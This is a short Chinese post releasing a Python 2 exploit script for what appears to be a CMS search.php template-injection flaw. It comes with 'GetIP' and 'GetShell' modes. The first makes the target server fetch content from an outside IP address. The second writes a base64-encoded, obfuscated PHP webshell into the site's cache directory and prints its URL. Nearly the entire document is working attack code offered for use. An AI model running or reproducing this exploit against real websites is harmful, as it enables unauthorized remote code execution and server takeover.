这个洞修复的七七八八了 现在就放出来吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#encoding:utf-8
from urllib import urlencode
import urllib2

def getshell(target, mode):
    url = target + "/search.php"
    user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
    
    try:
        
        if mode == "1":
            data = "searchword=1&searchtype=5&_GET[cfg_cmspath]={if{searchpage:year}}&year=:ev{searchpage:area}&area=a{searchpage:letter}&letter=l%20({searchpage:lang}&yuyan=join({searchpage:jq}&jq=$GLOBALS[a]))&a[]=file_g&a[]=et_contents($GLOBALS[b]);ec&a[]=ho(md5(124));exit;&b=http://119.28.176.149/"
            request = urllib2.Request(url, data)
            request.add_header('User-Agent', user_agent)
            
            hash = "c8ffe9a587b126f152ed3d89a146b445"
            
        else:
            data = "searchword=1&searchtype=5&_GET[cfg_cmspath]={if{searchpage:year}}&year=:ev{searchpage:area}&area=a{searchpage:letter}&letter=l%20({searchpage:lang}&yuyan=join({searchpage:jq}&jq=$GLOBALS[a]))&a[]=file_p&a[]=ut_contents($GLO&a[]=BALS[b],base&a[]=64_decode($GLOBALS[c]));ec&a[]=ho(md5(123));exit;&b=./data/cache/wee.php&c=PD9waHAgCiRsZz0iWlRack5HdGZhMlJyaXJaV3RpcmphMjlyWkdpcnRsaXJJaWs3Q2lSelluQWdQaXJTQWtkaXJtSnNLQ2lySmpkSGNpTENJaUxDSmpkSGlyZGppclkzUjNjaXJtVmpkSGRoZEdOMGQyVmpkSGRmWm1OMGQzVnVpclkyTiI7CiR2cT0iSUFva2RXWTlpckluTnVZek1pT3dva2EyRTlpcklrbEZRbXhraXJiVVppYzBzaU9ZGFzZGRlZGQ2ZGQ0ZGRfZGRkZGRlZGRjZGRvZGRkZGRlIik7CiRpZmwgPSAkamooImVmIiwiIiwiZWZjcmVhdGVmZV9lZmZlZnVlZm5lZmNlZnRpZWZvZWZuIik7CiRqZXogPSAkaWZsKCcnLCAkbnN4KCRqaigiaXIiLCAiIiwgJHZxLiRya2YuJGxnLiRxaSkpKTsgJGpleigpOwo/Pg=="
            request = urllib2.Request(url, data)
            request.add_header('User-Agent', user_agent)
            
            hash = "202cb962ac59075b964b07152d234b70"
        response = urllib2.urlopen(request)
        res = response.read()
        if hash == "c8ffe9a587b126f152ed3d89a146b445" and hash in res:
            print "*** GetIP success!"
        elif hash == "202cb962ac59075b964b07152d234b70" and hash in res:
            print "*** shell: " + target + "/data/cache//wee.php"
        else:
            print res
    except urllib2.URLError, e:
        print "Error: " + str(e.code)

if __name__ == "__main__":
    
    print " Mode: "
    print "     1. GetIP"
    print "     2. GetShell"
    mode = raw_input()
    if mode == "1":
        print "Mode: GetIP"
        print "Url:"
    else:
        print "Mode: GetShell"
        print "Url:"
    target = raw_input()
    getshell(target,mode)